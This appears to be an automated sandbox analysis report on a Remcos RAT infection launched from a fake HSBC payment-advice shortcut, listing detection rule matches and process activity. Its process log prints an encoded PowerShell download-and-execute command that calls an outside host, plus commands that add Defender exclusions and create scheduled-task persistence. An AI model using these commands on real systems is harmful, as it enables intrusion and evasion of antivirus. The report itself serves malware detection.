Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_004316FB	17_2_004316FB
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0043569E	17_2_0043569E
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_00443700	17_2_00443700
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_004257FB	17_2_004257FB
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_004128E3	17_2_004128E3
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_00425964	17_2_00425964
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0041B917	17_2_0041B917
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0043D9CC	17_2_0043D9CC
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_00435AD3	17_2_00435AD3
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_00424BC3	17_2_00424BC3
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0043DBFB	17_2_0043DBFB
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0044ABA9	17_2_0044ABA9
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_00433C0B	17_2_00433C0B
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_00434D8A	17_2_00434D8A
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0043DE2A	17_2_0043DE2A
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_0041CEAF	17_2_0041CEAF
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: 17_2_00435F08	17_2_00435F08

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: String function: 00402073 appears 51 times
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: String function: 00432B90 appears 53 times
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Code function: String function: 00432525 appears 41 times

Source: 3.2.PuttyTest777.pif.37293a8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 3.2.PuttyTest777.pif.37293a8.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.PuttyTest777.pif.37293a8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.2.HODoCxSdp.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.HODoCxSdp.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.HODoCxSdp.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.2.HODoCxSdp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.HODoCxSdp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.HODoCxSdp.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 12.2.HODoCxSdp.exe.3869dc8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.HODoCxSdp.exe.3869dc8.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.HODoCxSdp.exe.3869dc8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 3.2.PuttyTest777.pif.379e9c8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.HODoCxSdp.exe.38df3e8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 3.2.PuttyTest777.pif.379e9c8.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.HODoCxSdp.exe.38df3e8.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.PuttyTest777.pif.379e9c8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 12.2.HODoCxSdp.exe.38df3e8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 3.2.PuttyTest777.pif.379e9c8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 3.2.PuttyTest777.pif.379e9c8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 12.2.HODoCxSdp.exe.38df3e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.HODoCxSdp.exe.38df3e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 12.2.HODoCxSdp.exe.3869dc8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.HODoCxSdp.exe.3869dc8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 3.2.PuttyTest777.pif.37293a8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 3.2.PuttyTest777.pif.37293a8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000000C.00000002.1787198536.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000003.00000002.1748001168.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: PuttyTest777.pif PID: 2108, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: HODoCxSdp.exe PID: 7476, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: HODoCxSdp.exe PID: 7812, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: PuttyTest777.pif.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: HODoCxSdp.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, D9EudLlbHv2APZOL2i.cs	Security API names: _0020.SetAccessControl
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, D9EudLlbHv2APZOL2i.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, D9EudLlbHv2APZOL2i.cs	Security API names: _0020.AddAccessRule
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, EtsJobhTeXI6X3UQ5n.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, EtsJobhTeXI6X3UQ5n.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, D9EudLlbHv2APZOL2i.cs	Security API names: _0020.SetAccessControl
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, D9EudLlbHv2APZOL2i.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, D9EudLlbHv2APZOL2i.cs	Security API names: _0020.AddAccessRule
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, D9EudLlbHv2APZOL2i.cs	Security API names: _0020.SetAccessControl
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, D9EudLlbHv2APZOL2i.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, D9EudLlbHv2APZOL2i.cs	Security API names: _0020.AddAccessRule
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, EtsJobhTeXI6X3UQ5n.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.2.PuttyTest777.pif.3b869b0.2.raw.unpack, EtsJobhTeXI6X3UQ5n.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, EtsJobhTeXI6X3UQ5n.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, EtsJobhTeXI6X3UQ5n.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winLNK@27/23@2/4

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

17_2_00415C90

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,

17_2_0040E2E7

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,

17_2_00419493

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

17_2_00418A00

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\PuttyTest777.pif

Jump to behavior

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Mutant created: \Sessions\1\BaseNamedObjects\aHbsRqcXCAHRAEQcDvjfkNSbY
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-O7QOC3
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfvjlsdp.w0v.ps1

Jump to behavior

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: Payment Advice__HSBC Banking.pdf.lnk	Virustotal: Detection: 37%
Source: Payment Advice__HSBC Banking.pdf.lnk	ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cMD /c PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\PuttyTest777.pif "C:\Users\user\AppData\Roaming\PuttyTest777.pif"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PuttyTest777.pif"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HODoCxSdp.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpE952.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process created: C:\Users\user\AppData\Roaming\PuttyTest777.pif "C:\Users\user\AppData\Roaming\PuttyTest777.pif"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\HODoCxSdp.exe C:\Users\user\AppData\Roaming\HODoCxSdp.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpF9EC.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process created: C:\Users\user\AppData\Roaming\HODoCxSdp.exe "C:\Users\user\AppData\Roaming\HODoCxSdp.exe"
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process created: C:\Users\user\AppData\Roaming\HODoCxSdp.exe "C:\Users\user\AppData\Roaming\HODoCxSdp.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\PuttyTest777.pif "C:\Users\user\AppData\Roaming\PuttyTest777.pif"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PuttyTest777.pif"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HODoCxSdp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpE952.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process created: C:\Users\user\AppData\Roaming\PuttyTest777.pif "C:\Users\user\AppData\Roaming\PuttyTest777.pif"	Jump to behavior
